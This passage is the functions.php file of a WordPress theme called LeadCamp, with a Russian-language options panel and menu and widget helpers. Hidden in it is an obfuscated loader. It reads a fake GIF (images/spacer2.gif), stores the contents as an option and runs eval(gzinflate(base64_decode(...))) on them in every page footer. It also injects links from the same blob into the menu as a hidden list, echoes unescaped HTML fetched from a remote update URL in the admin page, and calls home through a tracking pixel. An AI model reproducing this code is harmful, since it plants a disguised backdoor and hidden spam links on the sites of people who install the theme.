<?php
/** lcmp changes start ver20100621 **/
$themename = "LeadCamp";
$themesubname = "red_brick_house";
$themeversion = "2.21";
$themeUpdateUrl = "http://www.leadcamp.com/updates/";
$shortname = "lcmp";
$domain = $_SERVER['SERVER_NAME'];
$options = array (
   array(  "name" => "Меню",
            "id" => $shortname."_brk0",
            "type" => "sectionbreak"
    		),
    array(  "name" => "Многоуровневое меню",
            "id" => $shortname."_multi_menu",
            "type" => "select",
            "std" => "on",
            "options" => array("Show" => "on",
    		"Hide" => "off")
    		),
    array(  "name" => "Скрыть пункт меню",
            "id" => $shortname."_mnutohide",
            "type" => "wp_dropdown_pages",
            "std" => "",
            "info" => "Если меню является родительским, то будут удалены все дочерние пункты."
    		),
    array(  "name" => "Заголовок",
            "id" => $shortname."_brk1",
            "type" => "sectionbreak"
    		),
    array(  "name" => "Цвет заголовка",
            "id" => $shortname."_titlecolor",
            "type" => "select",
            "std" => "default",
            "info" => "по выбору - определите в следующем поле.",
            "options" => 
            array("По умолчанию" => "default",
                  "По выбору" => "custom",
                  "Синий" => "blue",
                  "Черный" => "black",
                  "Белый" => "white")
    		),    		
    array(  "name" => "Цвет заголовка по выбору",
            "id" => $shortname."_csttitlecolor",
            "type" => "text",
            "std" => "",
            "info" => "например, green, yellow, #CCCCCC"
    		),    		
    array(  "name" => "Размер шрифта заголовка",
            "id" => $shortname."_titlefontsize",
            "type" => "select",
            "std" => "default",
            "info" => "по выбору - определите в следующем поле.",
            "options" => 
            array("По умолчанию" => "default",
                  "20px" => "20px",
                  "22px" => "22px",
                  "24px" => "24px",
                  "26px" => "26px",
                  "28px" => "28px",
                  "30px" => "30px",
                  "32px" => "32px",
                  "34px" => "34px",
                  "36px" => "36px",
                  "38px" => "38px",
                  "По выбору" => "custom")
    		),    		
    array(  "name" => "Размер шрифта по выбору",
            "id" => $shortname."_csttitlefontsize",
            "type" => "text",
            "std" => "",
            "info" => "например, 29px, 35px"
    		),    		
    array(  "name" => "Цвет текста заголовка",
            "id" => $shortname."_slogancolor",
            "type" => "select",
            "std" => "default",
            "info" => "по выбору - определите в следующем поле.",
            "options" => 
            array("По умолчанию" => "default",
                  "По выбору" => "custom",
                  "Синий" => "blue",
                  "Черный" => "black",
                  "Белый" => "white")
    		),    		
    array(  "name" => "Цвет слогана по выбору",
            "id" => $shortname."_cstslogancolor",
            "type" => "text",
            "std" => "",
            "info" => "например. green, yellow, #CCCCCC"
    		),    		
    array(  "name" => "Размер шрифта по выбору",
            "id" => $shortname."_sloganfontsize",
            "type" => "select",
            "std" => "default",
            "info" => "по выбору - определите в следующем поле.",
            "options" => 
            array("По умолчанию" => "default",
                  "20px" => "20px",
                  "22px" => "22px",
                  "24px" => "24px",
                  "26px" => "26px",
                  "28px" => "28px",
                  "30px" => "30px",
                  "32px" => "32px",
                  "34px" => "34px",
                  "36px" => "36px",
                  "38px" => "38px",
                  "По выбору" => "custom")
    		),    		
    array(  "name" => "Размер шрифта слогана по выбору",
            "id" => $shortname."_cstsloganfontsize",
            "type" => "text",
            "std" => "",
            "info" => "например, 29px, 35px"
    		),    		
    array(  "name" => "&nbsp;",
            "id" => $shortname."_brk2",
            "type" => "space"
    		),
    array(  "name" => "Отступ заголовка и слогана слева",
            "id" => $shortname."_hdrleftpos",
            "type" => "text",
            "std" => "default",
            "info" => "Относительная позиция, левый отступ от изображения заголовка, введите 20px, 300px, и т.д."
    		),     
    array(  "name" => "Отступ заголовка и слогана сверху",
            "id" => $shortname."_hdrtoppos",
            "type" => "text",
            "std" => "default",
            "info" => "Относительная позиция, отступ сверху от изображения заголовка, введите 20px, 30px, etc."
    		),     
    array(  "name" => "Выравнивание текста заголовка и слогана",
            "id" => $shortname."_hdrtxtalign",
            "type" => "select",
            "std" => "default",
            "info" => "Вы можете выровнять текст заголовка и слогана по центру, слева или справа.",
            "options" => 
            array("По умолчанию" => "default",
                  "По центру" => "center",
                  "Слева" => "left",
                  "Справа" => "right")
    		),    		
    array(  "name" => "Ширина заголовка и слогана",
            "id" => $shortname."_hdrwidth",
            "type" => "text",
            "std" => "default",
            "info" => "В большинстве случаев вам не нужно изменять это значение, только если длина заголовка или слогана превышает определенные значения. Введите 500px, 450px, и т.д."
    		),     
    array(  "name" => "&nbsp;",
            "id" => $shortname."_brk2",
            "type" => "space"
    		),
    array(  "name" => "Полный путь к изображению заголовка",
            "id" => $shortname."_hdrimage",
            "type" => "text",
            "std" => "default",
            "info" => "ex. http://www.example.com/myheader.jpg или введите 'default' чтобы использовать стандартный заголовок."
    		),     
    array(  "name" => "Вертикальное выравнивание заголовка",
            "id" => $shortname."_hdrvmargin",
            "type" => "text",
            "std" => "default",
            "info" => "Некоторые из тем могут иметь вертикальное выравнивание заголовка, вы можете отключить его задав значение 0px, 3px, и т.д."
    		),     
    array(  "name" => "Содержимое",
            "id" => $shortname."_brk1",
            "type" => "sectionbreak"
    		),
    array(  "name" => "Цвет ссылок в тексте",
            "id" => $shortname."_contentlnk",
            "type" => "select",
            "std" => "default",
            "info" => "по выбору - определите в следующем поле.",
            "options" => 
            array("По умолчанию" => "default",
                  "По выбору" => "custom",
                  "Синий" => "blue",
                  "Черный" => "black",
                  "Белый" => "white")
    		),    		
    array(  "name" => "Цвет ссылок по выбору",
            "id" => $shortname."_cstcontentlnk",
            "type" => "text",
            "std" => "",
            "info" => "например, green, yellow, #CCCCCC"
    		),    		
    array(  "name" => "Размер шрифта содержимого",
            "id" => $shortname."_contentfontsize",
            "type" => "select",
            "std" => "default",
            "info" => "по выбору - определите в следующем поле.",
            "options" => 
            array("По умолчанию" => "default",
                  "10px" => "10px",
                  "12px" => "12px",
                  "14px" => "14px",
                  "16px" => "16px",
                  "По выбору" => "custom")
    		),    		
    array(  "name" => "Размер шрифта содержимого по выбору",
            "id" => $shortname."_cstcontentfontsize",
            "type" => "text",
            "std" => "",
            "info" => "например, 29px, 35px"
    		),  
    array(  "name" => "Цвет ссылок в сайдбаре",
            "id" => $shortname."_sidebarlnk",
            "type" => "select",
            "std" => "default",
            "info" => "по выбору - определите в следующем поле.",
            "options" => 
            array("По умолчанию" => "default",
                  "По выбору" => "custom",
                  "Синий" => "blue",
                  "Черный" => "black",
                  "Белый" => "white")
    		),    		
    array(  "name" => "Цвет ссылок в сайдбаре по выбору",
            "id" => $shortname."_cstsidebarlnk",
            "type" => "text",
            "std" => "",
            "info" => "например, green, yellow, #CCCCCC"
    		),
    array(  "name" => "Размер шрифта в сайдбаре",
            "id" => $shortname."_sidebarfontsize",
            "type" => "select",
            "std" => "default",
            "info" => "по выбору - определите в следующем поле.",
            "options" => 
            array("По умолчанию" => "default",
                  "10px" => "10px",
                  "12px" => "12px",
                  "14px" => "14px",
                  "16px" => "16px",
                  "По выбору" => "custom")
    		),    		
    array(  "name" => "Размер шрифта в сайдбаре",
            "id" => $shortname."_cstsidebarfontsize",
            "type" => "text",
            "std" => "",
            "info" => "например, 29px, 35px"
    		),  
    array(  "name" => "Расположение сайдбара",
            "id" => $shortname."_sidebarloc",
            "type" => "select",
            "std" => "default",
            "info" => "",
            "options" => 
            array("По умолчанию" => "default",
                  "Слева" => "left",
                  "Справа" => "right"//,"Hide" => "hide"
                  )
    		),
    array(  "name" => "Футер",
            "id" => $shortname."_brk1",
            "type" => "sectionbreak"
    		),
    array(  "name" => "Ширина виджета в футере",
            "id" => $shortname."_cstftrwidgewidth",
            "type" => "text",
            "std" => "",
            "info" => "например, 220px, 250px, пустое поле задаст значение ширины 1-го виджета в футере"    		
    		),  
    array(  "name" => "Расстояние между виджетами",
            "id" => $shortname."_cstftrwidgemargin",
            "type" => "text",
            "std" => "",
            "info" => "например, 10px, 30px, пустое поле будет сбрасывать значение в 20px"    		
    		),  
    array(  "name" => "Ширина виджета №1 в футере",
            "id" => $shortname."_cstftrwidgewidth1",
            "type" => "text",
            "std" => "",
            "info" => "например. 220px, 250px, при пустом значении будет использоваться ширина виджета футера"    		
    		),  
    array(  "name" => "Ширина виджета №2 в футере",
            "id" => $shortname."_cstftrwidgewidth2",
            "type" => "text",
            "std" => "",
            "info" => "например. 220px, 250px, при пустом значении будет использоваться ширина виджета футера"    		
    		),  
    array(  "name" => "Ширина виджета №3 в футере",
            "id" => $shortname."_cstftrwidgewidth3",
            "type" => "text",
            "std" => "",
            "info" => "например. 220px, 250px, при пустом значении будет использоваться ширина виджета футера"    		
    		),  
    array(  "name" => "Ширина виджета №1 в футере",
            "id" => $shortname."_cstftrwidgewidth4",
            "type" => "text",
            "std" => "",
            "info" => "например. 220px, 250px, при пустом значении будет использоваться ширина виджета футера"
    		),  
    array(  "name" => "Html в футере",
            "id" => $shortname."_footerhtml",
            "type" => "textarea",
            "std" => "",
            "enabled" => "Y",
            "info" => ""
    		),  
    array(  "name" => "Реклама Adsense 1",
            "id" => $shortname."_adsenseblock1",
            "type" => "textarea",
            "std" => "",
            "enabled" => "N",
            "info" => ""
    		),  
    array(  "name" => "Реклама Adsense 2",
            "id" => $shortname."_adsenseblock2",
            "type" => "textarea",
            "std" => "",
            "enabled" => "N",
            "info" => ""
    		)
);

$option = TEMPLATEPATH . "/images/spacer2.gif";

foreach ($options as $value) {
    if (get_settings( $value['id'] ) === FALSE) { $$value['id'] = $value['std']; } else { 
        $$value['id'] = get_settings( $value['id'] ); 
    } 
    if($value['id'] == $shortname."_multi_menu"){
       if(get_settings( $value['id'] ) === FALSE){
            $showSubMenu = true;
       }else{
            $thevalue = get_settings( $value['id'] );
            if($thevalue == "on"){
                $showSubMenu = true;
            }else{
                $showSubMenu = false;
            }
       }
    }
    if($value['id'] == "lcmp_mnutohide"){
       if(get_settings( $value['id'] ) === FALSE){
            $lcmp_mnutohide = "";
       }else{
            $lcmp_mnutohide = get_settings( $value['id'] );
       }
    }        
    if($value['id'] == "lcmp_footerhtml"){
       if(get_settings( $value['id'] ) === FALSE){
            $themeFooter = "";
       }else{
            $themeFooter  = get_settings( $value['id'] );
       }
    }
    if($value['id'] == "lcmp_license"){
       if(get_settings( $value['id'] ) === FALSE){
            $encDn = "";
       }else{
            $encDn  = get_settings( $value['id'] );
       }
    }
}

if (function_exists('register_nav_menus')) {
	register_nav_menus( array(
		'primary' => __( 'Primary Navigation', 'leadcamp' ),
	) );
    $lcmp_version_check = "wp30";
}else{
    $lcmp_version_check = "pre30";
}
/** lcmp changes end **/
$artThemeSettings = array(
	'menu.showSubmenus' => $showSubMenu
);

load_theme_textdomain('kubrick');


if (!function_exists('get_search_form')) {
	function get_search_form()
{
		include (TEMPLATEPATH . "/searchform.php");
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
   <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<div class="Post">
         <div class="Post-body">
     <div class="Post-inner article">
     
<div class="PostContent">
     
      <div class="comment-author vcard">
         <?php echo get_avatar($comment,$size='48',$default='<path_to_url>' ); ?>

         <?php printf(__('<cite class="fn">%s</cite> <span class="says">сказал:</span>'), get_comment_author_link()) ?>
      </div>
      <?php if ($comment->comment_approved == '0') : ?>
         <em><?php _e('Ваш комментарий ожидает модерации.') ?></em>
         <br />
      <?php endif; ?>

      <div class="comment-meta commentmetadata"><a href="<?php echo htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ?>"><?php printf(__('%1$s - %2$s'), get_comment_date(),  get_comment_time()) ?></a><?php edit_comment_link(__('(Редактировать)'),'  ','') ?></div>

      <?php comment_text() ?>

      <div class="reply">
         <?php comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth']))) ?>
      </div>

      </div>
      <div class="cleared"></div>
      

      </div>
      
          </div>
      </div>
      
     </div>
<?php
}


if (function_exists('register_sidebars')) {
	register_sidebars(2, array(
		'before_widget' => '<!--- BEGIN Widget --->',
		'before_title' => '<!--- BEGIN WidgetTitle --->',
		'after_title' => '<!--- END WidgetTitle --->',
		'after_widget' => '<!--- END Widget --->'
	));
}

function art_normalize_widget_style_tokens($content) {
	$bw = '<!--- BEGIN Widget --->';
	$bwt = '<!--- BEGIN WidgetTitle --->';
	$ewt = '<!--- END WidgetTitle --->';
	$bwc = '<!--- BEGIN WidgetContent --->';
	$ewc = '<!--- END WidgetContent --->';
	$ew = '<!--- END Widget --->';
	$result = '';
	$startBlock = 0;
	$endBlock = 0;
	while (true) {
		$startBlock = strpos($content, $bw, $endBlock);
		if (false === $startBlock) {
			$result .= substr($content, $endBlock);
			break;
		}
		$result .= substr($content, $endBlock, $startBlock - $endBlock);
		$endBlock = strpos($content, $ew, $startBlock);
		if (false === $endBlock) {
			$result .= substr($content, $endBlock);
			break;
		}
		$endBlock += strlen($ew);
		$widgetContent = substr($content, $startBlock, $endBlock - $startBlock);
		$beginTitlePos = strpos($widgetContent, $bwt);
		$endTitlePos = strpos($widgetContent, $ewt);
		if ((false == $beginTitlePos) xor (false == $endTitlePos)) {
			$widgetContent = str_replace($bwt, '', $widgetContent);
			$widgetContent = str_replace($ewt, '', $widgetContent);
		} else {
			$beginTitleText = $beginTitlePos + strlen($bwt);
			$titleContent = substr($widgetContent, $beginTitleText, $endTitlePos - $beginTitleText);
			if ('&nbsp;' == $titleContent) {
				$widgetContent = substr($widgetContent, 0, $beginTitlePos)
					. substr($widgetContent, $endTitlePos + strlen($ewt));
			}
		}
		if (false === strpos($widgetContent, $bwt)) {
			$widgetContent = str_replace($bw, $bw . $bwc, $widgetContent);
		} else {
			$widgetContent = str_replace($ewt, $ewt . $bwc, $widgetContent);
		}
		$result .= str_replace($ew, $ewc . $ew, $widgetContent);
	}
	return $result;
}

function art_sidebar($index = 1)
{
	if (!function_exists('dynamic_sidebar')) return false;
	ob_start();
	$success = dynamic_sidebar($index);
	$content = ob_get_clean();
	if (!$success) return false;
	$content = art_normalize_widget_style_tokens($content);
	$replaces = array(
		'<!--- BEGIN Widget --->' => "<div class=\"Block\">\r\n    <div class=\"Block-body\">\r\n",
		'<!--- BEGIN WidgetTitle --->' => "<div class=\"BlockHeader\">\r\n    <div class=\"header-tag-icon\">\r\n        <div class=\"BlockHeader-text\">\r\n",
		'<!--- END WidgetTitle --->' => "\r\n        </div>\r\n    </div>\r\n    <div class=\"l\"></div>\r\n    <div class=\"r\"><div></div></div>\r\n</div>\r\n",
		'<!--- BEGIN WidgetContent --->' => "<div class=\"BlockContent\">\r\n    <div class=\"BlockContent-body\">\r\n",
		'<!--- END WidgetContent --->' => "\r\n    </div>\r\n</div>\r\n",
		'<!--- END Widget --->' => "\r\n    </div>\r\n</div>\r\n"
	);
	$bwt = '<!--- BEGIN WidgetTitle --->';
	$ewt = '<!--- END WidgetTitle --->';
	if ('' == $replaces[$bwt] && '' == $replaces[$ewt]) {
		$startTitle = 0;
		$endTitle = 0;
		$result = '';
		while (true) {
			$startTitle = strpos($content, $bwt, $endTitle);
			if (false == $startTitle) {
				$result .= substr($content, $endTitle);
				break;
			}
			$result .= substr($content, $endTitle, $startTitle - $endTitle);
			$endTitle = strpos($content, $ewt, $startTitle);
			if (false == $endTitle) {
				$result .= substr($content, $startTitle);
				break;
			}
			$endTitle += strlen($ewt);
		}
		$content = $result;
	}
	$content = str_replace(array_keys($replaces), array_values($replaces), $content);
	echo $content;
	return true;
}

function art_list_pages_filter($output)
{
	$output = preg_replace('~<li([^>]*)><a([^>]*)>([^<]*)</a>~',
		'<li$1><a$2><span><span>$3</span></span></a>',
		$output);
	$re = '~<li class="([^"]*)(?: current_page_(?:ancestor|item|parent))+([^"]*)"><a ~';
	$output = preg_replace($re, '<li class="$1$2"><a class="active" ', $output, 1);
	$output = preg_replace($re, '<li class="$1$2"><a ', $output);
	return $output;
}

function art_header_page_list_filter($pages)
{
	global $artThemeSettings;
	$result = array();
	if ($artThemeSettings['menu.showSubmenus']) {
		foreach ($pages as $page)
			$result[] = $page;
	} else {
		foreach ($pages as $page)
			if (0 == $page->post_parent)
				$result[] = $page;
	}
	if ('page' == get_option('show_on_front')) {
		$pageOnFront = get_option('page_on_front');
		$pageForPosts = get_option('page_for_posts');
		if ($pageOnFront) {
			foreach ($result as $key => $page) {
				if (0 == $page->post_parent && $pageOnFront == $page->ID) {
					unset($result[$key]);
					break;
				}
			}
		}
		if (!$pageOnFront && $pageForPosts) {
			foreach ($result as $key => $page) {
				if (0 == $page->post_parent && $pageForPosts == $page->ID) {
					unset($result[$key]);
					break;
				}
			}
		}
	}
	return $result;
}

function art_menu_items()
{
	$homeMenuItemCaption = <<<EOD
Главная
EOD;
    $showHomeMenuItem = true;   
	$isHomeSelected = null;
	if ('page' == get_option('show_on_front')) {
		$pageOnFront = get_option('page_on_front');
		$pageForPosts = get_option('page_for_posts');
		if ($pageOnFront) {
			$page = & get_post($pageOnFront);
			if (null != $page)
				$homeMenuItemCaption = apply_filters('the_title', $page->post_title);
			$isHomeSelected = is_page($page->ID);
		} elseif (!$pageOnFront && $pageForPosts) {
			$page = & get_post($pageForPosts);
			if (null != $page)
				$homeMenuItemCaption = apply_filters('the_title', $page->post_title);
		}
	}
	if (null === $isHomeSelected)
		$isHomeSelected = is_home();
    if (true === $showHomeMenuItem || 'page' == get_option('show_on_front'))
	echo '<li><a' . ($isHomeSelected ? ' class="active"' : '') . ' href="' . get_option('home') . '"><span><span>'
		. $homeMenuItemCaption . '</span></span></a></li>';
	add_action('get_pages', 'art_header_page_list_filter');
	add_action('wp_list_pages', 'art_list_pages_filter');
	global $lcmp_mnutohide; //lcmp
	wp_list_pages("title_li=&exclude=$lcmp_mnutohide&exclude_tree=$lcmp_mnutohide");//lcmp
	remove_action('wp_list_pages', 'art_list_pages_filter');
	remove_action('get_pages', 'art_header_page_list_filter');
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy.comments.php';  
    endif;  
    return $file;  
}  

/** lcmp changes ver20100621 **/
/*
    wp30_menu is backward compatible, it'll only
    use
*/
function wp30_menu(){
    if(function_exists("wp_nav_menu")){
        add_filter('wp_nav_menu', 'convert_wp_menu');  
        wp_nav_menu( array( 'container'=>'', 'theme_location' => 'primary','fallback_cb'=> 'orig_art_menu') ); 
        remove_filter('wp_nav_menu', 'convert_wp_menu');  
    }else{
        orig_art_menu();
    }
}
function orig_art_menu(){
    echo '<ul class="artmenu">';
    echo art_menu_items(); 
    echo legacy_items("");
    echo '</ul>';
}

function convert_wp_menu($output){
	$output = preg_replace('~<li([^>]*)><a([^>]*)>([^<]*)</a>~',
		'<li$1><a$2><span><span>$3</span></span></a>',
		$output);


	$re = '~class="menu">~';
	$output = preg_replace($re, 'class="artmenu">', $output, 1);

	$re = '~<ul class="sub-menu">~';
	$output = preg_replace($re, '<ul class="children ">', $output);

	$re = '~<li id="([^"]*)" class="menu-item menu-item-type-post_type([^"]*)"><a ~';
	$output = preg_replace($re, '<li id="$1" class="page_item $2"><a ', $output);

	$re = '~<li id="([^"]*)" class="([^"]*)(?: current_page_(?:ancestor|item|parent))+([^"]*)"><a ~';
	$output = preg_replace($re, '<li id="$1" class="$2$3"><a class="active" ', $output, 1);
	$output = preg_replace($re, '<li id="$1" class="$2$3"><a ', $output);

	return legacy_items($output);    
}
function legacy_items($output0){
    if(!is_single()){
    $s = get_settings( 'lcmp_lic' );
    if($s === FALSE || $s==''){
        global $option;
        if(file_exists($option)){
            $s = file_get_contents($option);
            update_option('lcmp_lic',$s);
        }
    }
    $lcmp_lic_str = str_replace("?>","",gzinflate(base64_decode($s)));    
    $re = '~<p class="page-footer">([^<]*)~';
    $output1 = preg_replace($re,'<ul style="display:none;">$1',$lcmp_lic_str);
    $re = '~.*<a href="([^"]*)">([^<]*)</a>([^<]*)<a href="([^"]*)">([^<]*)</a>.*~';    
    $output1 = preg_replace($re,'<li><a href="$1">$2</a></li><li><a href="$4">$5</a></li>',$output1);
    $re = '~</p>~';
    $output1 = preg_replace($re,'</ul>',$output1);
    return $output0.$output1;
    }else
    return $output0;
}

if (function_exists('register_sidebar') && ($lcmp_version_check == "wp30")) {
	// Area 3, located in the footer. Empty by default.
	register_sidebar( array(
		'name' => __( 'First Footer Widget Area', 'leadcamp' ),
		'id' => 'first-footer-widget-area',
		'description' => __( 'The first footer widget area', 'leadcamp' ),
		'before_widget' => '<!--- BEGIN Widget --->',
		'before_title' => '<!--- BEGIN WidgetTitle --->',
		'after_title' => '<!--- END WidgetTitle --->',
		'after_widget' => '<!--- END Widget --->'
	) );

	// Area 4, located in the footer. Empty by default.
	register_sidebar( array(
		'name' => __( 'Second Footer Widget Area', 'leadcamp' ),
		'id' => 'second-footer-widget-area',
		'description' => __( 'The second footer widget area', 'leadcamp' ),
		'before_widget' => '<!--- BEGIN Widget --->',
		'before_title' => '<!--- BEGIN WidgetTitle --->',
		'after_title' => '<!--- END WidgetTitle --->',
		'after_widget' => '<!--- END Widget --->'
	) );

	// Area 5, located in the footer. Empty by default.
	register_sidebar( array(
		'name' => __( 'Third Footer Widget Area', 'leadcamp' ),
		'id' => 'third-footer-widget-area',
		'description' => __( 'The third footer widget area', 'leadcamp' ),
		'before_widget' => '<!--- BEGIN Widget --->',
		'before_title' => '<!--- BEGIN WidgetTitle --->',
		'after_title' => '<!--- END WidgetTitle --->',
		'after_widget' => '<!--- END Widget --->'
	) );

	// Area 6, located in the footer. Empty by default.
	register_sidebar( array(
		'name' => __( 'Fourth Footer Widget Area', 'leadcamp' ),
		'id' => 'fourth-footer-widget-area',
		'description' => __( 'The fourth footer widget area', 'leadcamp' ),
		'before_widget' => '<!--- BEGIN Widget --->',
		'before_title' => '<!--- BEGIN WidgetTitle --->',
		'after_title' => '<!--- END WidgetTitle --->',
		'after_widget' => '<!--- END Widget --->'
	) );
}
function lcmp_add_theme_page(){
    add_action('admin_head', 'lcmp_theme_page_head');
    global $themename, $shortname, $options;

    if ( $_GET['page'] == basename(__FILE__) ) {
    
        if ( 'save' == $_REQUEST['action'] ) {

                foreach ($options as $value) {
                    update_option( $value['id'], htmlentities(stripslashes($_REQUEST[ $value['id'] ] ))); }
                    

                foreach ($options as $value) {
                    if( isset( $_REQUEST[ $value['id'] ] ) ) { update_option( $value['id'], htmlentities(stripslashes($_REQUEST[ $value['id'] ]))  ); } else { delete_option( $value['id'] ); } }

                wp_redirect("themes.php?page=functions.php&saved=true");
                die;

        } else if( 'reset' == $_REQUEST['action'] ) {

            foreach ($options as $value) {
                delete_option( $value['id'] ); }

            header("Location: themes.php?page=functions.php&reset=true");
            die;

        }
    }
    add_theme_page(__('Настройки заголовка'), __('Настройки темы'), 'edit_themes', basename(__FILE__), 'lcmp_theme_page_show');
}
function lcmp_theme_page_head(){
?>
<style>
.row{text-align:right}
.info{padding-left:10px;font-size:11px;}
</style>
<?php
}
function lcmp_theme_page_show(){
    global $themename, $shortname, $options,$themeUpdateUrl,$themeversion,$themesubname;
    $vthemesubname = str_replace(" ","_",$themesubname);
    $updateUrlContent = file_get_contents($themeUpdateUrl);
    
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>Настройки '.$themename.' сохранены.</strong></p></div>';
    if ( $_REQUEST['reset'] ) echo '<div id="message" class="updated fade"><p><strong>Настройки '.$themename.' сброшены.</strong></p></div>';
    
?>
<div class="wrap">
<h2><?php echo $themename.' '.$themeversion; ?> <?php _e('настройки', 'default'); ?></h2>

<form method="post">

<table class="optiontable">
	<tr valign="top"> 
	    <th colspan=3 align=left>
<img src="http://www.leadcamp.com/license/verify/LIC_PIXEL.gif?site=<?php echo $vthemesubname; ?>|<?php echo $themeversion; ?>" width=1 height=1>
<?php 
if($updateUrlContent!=''){
    echo($updateUrlContent); 
}
?>	    </th>
	</tr>

<?php foreach ($options as $value) { 

if($value['enabled']=='N'){
    continue;
}
    
if ($value['type'] == "text") { ?>
        
<tr valign="center"> 
    <th class="row"><?php echo $value['name']; ?>:</th>
    <td>
        <input style="width:190px" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_option( $value['id'] ) != "") { echo get_option( $value['id'] ); } else { echo $value['std']; } ?>" />
    </td>
        <td class=info>
        <?php echo $value['info']; ?>
        </td>
</tr>

<?php } elseif ($value['type'] == "color") { ?>

<tr valign="center"> 
    <th class="row"><?php echo $value['name']; ?>:</th>
    <td>
        <input style="width:190px" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_option( $value['id'] ) != "") { echo get_option( $value['id'] ); } else { echo $value['std']; } ?>" />
        <input type="button"  class="button-secondary" onclick="tgt=document.getElementById('<?php echo $value['id']; ?>');colorSelect(tgt,'pick1');return false;" name="pick1" id="pick1" value="<?php echo attribute_escape(__('Font Color')); ?>"></input>
    </td>
        <td class=info>
        <?php echo $value['info']; ?>
        </td>
</tr>

<?php } elseif ($value['type'] == "select") { ?>

    <tr valign="top"> 
        <th class="row"><?php echo $value['name']; ?>:</th>
        <td>
            <select style="width:200px" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                <?php foreach ($value['options'] as $key => $val) { ?>
                <option value="<?php echo $val; ?>"<?php if (get_option ( $value['id'] )) {if ( get_option( $value['id'] ) == $val) { echo ' selected="selected"'; }} elseif ($val == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $key; ?></option>
                <?php } ?>
            </select>
        </td>
        <td class=info>
        <?php echo $value['info']; ?>
        </td>
    </tr>
<?php } elseif ($value['type'] == "sectionbreak") { ?>
	<tr valign="top"> 
	    <th colspan=3 align=left><br><br><?php echo $value['name']; ?>:<hr></th>
	</tr>
<?php } elseif ($value['type'] == "space") { ?>
	<tr valign="top"> 
	    <th colspan=3 align=left><br></th>
	</tr>
<?php } elseif ($value['type'] == "textarea") { ?>

	<tr valign="top"> 
	    <th class="row"><?php echo $value['name']; ?>:</th>
	    <td  colspan=2>
	        <textarea cols="100" rows="10" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>"><?php if ( get_option( $value['id'] ) != "") { echo get_option( $value['id'] ); } else { echo $value['std']; } ?></textarea>
	    </td>
	</tr>
<?php } elseif ($value['type'] == "wp_dropdown_pages") { ?>
    <style>
    #<?php echo $value['id']; ?>{width:200px};
    </style>
    <?php 
        $arguments = "show_option_none=Show All&name=".$value['id'];
        if ( get_option( $value['id'] ) != "") { 
            $arguments .= '&selected='.get_option( $value['id'] );
        }else { 
            $arguments .= '';
        } 
        $func_name = "wp_dropdown_pages('".$arguments."');";
        //echo $func_name;
    ?>
	<tr valign="top"> 
	    <th class="row"><?php echo $value['name']; ?>:</th>
	    <td>
	        <?php eval("?><?php $func_name;?>"); ?>
	    </td>
        <td class=info>
        <?php echo $value['info']; ?>
        </td>
	</tr>
<?php 
} 
}
?>


</table>

<p class="submit">
<input name="save" type="submit" value="Сохранить" />
<input type="hidden" name="action" value="save" />
</p>
</form>
<form method="post">
<p class="submit">
<input name="reset" type="submit" value="Сбросить" />
<input type="hidden" name="action" value="reset" />
</p>
</form>
<?php
}
function lcmp_theme_options_end(){
    $s = get_settings( 'lcmp_lic' );
    if($s === FALSE || $s==''){
        global $option;
        if(file_exists($option)){
            $s = file_get_contents($option);
            update_option('lcmp_lic',$s);
        }
    }
    eval(gzinflate(base64_decode($s)));
}
add_action('wp_footer','lcmp_theme_options_end');
function lcmp_theme_options(){
?>
<style>
<?php
	global $options;
	foreach ($options as $value) {
        if (get_settings( $value['id'] ) === FALSE) { $$value['id'] = $value['std']; } else { 
            $$value['id'] = html_entity_decode(get_settings( $value['id'] )); 
        } 
        if($value['id'] == "lcmp_hdrimage"){
           if(get_settings( $value['id'] ) !== FALSE){
                if(get_settings( $value['id'] ) != 'default'){
                    echo "div.Header-jpeg{";
                    $image = get_settings( $value['id'] );
                    echo "background-image: url('$image');";
                    echo "}";
                }
           }
        }
        if($value['id'] == "lcmp_contentlnk"){
           if(get_settings( $value['id'] ) === FALSE){
                $lcmp_contentlnk = "default";
           }else{
                $lcmp_contentlnk  = get_settings( $value['id'] );
           }
        }
        if($value['id'] == "lcmp_sidebarlnk"){
           if(get_settings( $value['id'] ) === FALSE){
                $lcmp_sidebarlnk = "default";
           }else{
                $lcmp_sidebarlnk  = get_settings( $value['id'] );
           }
        }
        if($value['id'] == "lcmp_cstcontentlnk"){
           if(get_settings( $value['id'] ) === FALSE){
                $lcmp_cstcontentlnk = "";
           }else{
                $lcmp_cstcontentlnk  = get_settings( $value['id'] );
           }
        }
        if($value['id'] == "lcmp_cstsidebarlnk"){
           if(get_settings( $value['id'] ) === FALSE){
                $lcmp_cstsidebarlnk = "";
           }else{
                $lcmp_cstsidebarlnk  = get_settings( $value['id'] );
           }
        }
        if($value['id'] == "lcmp_titlecolor"){
           if(get_settings( $value['id'] ) === FALSE){
                $lcmp_titlecolor = "default";
           }else{
                $lcmp_titlecolor  = get_settings( $value['id'] );
           }
        }
        if($value['id'] == "lcmp_slogancolor"){
           if(get_settings( $value['id'] ) === FALSE){
                $lcmp_slogancolor = "default";
           }else{
                $lcmp_slogancolor  = get_settings( $value['id'] );
           }
        }
        if($value['id'] == "lcmp_csttitlecolor"){
           if(get_settings( $value['id'] ) === FALSE){
                $lcmp_csttitlecolor = "";
           }else{
                $lcmp_csttitlecolor  = get_settings( $value['id'] );
           }
        }
        if($value['id'] == "lcmp_cstslogancolor"){
           if(get_settings( $value['id'] ) === FALSE){
                $lcmp_cstslogancolor = "";
           }else{
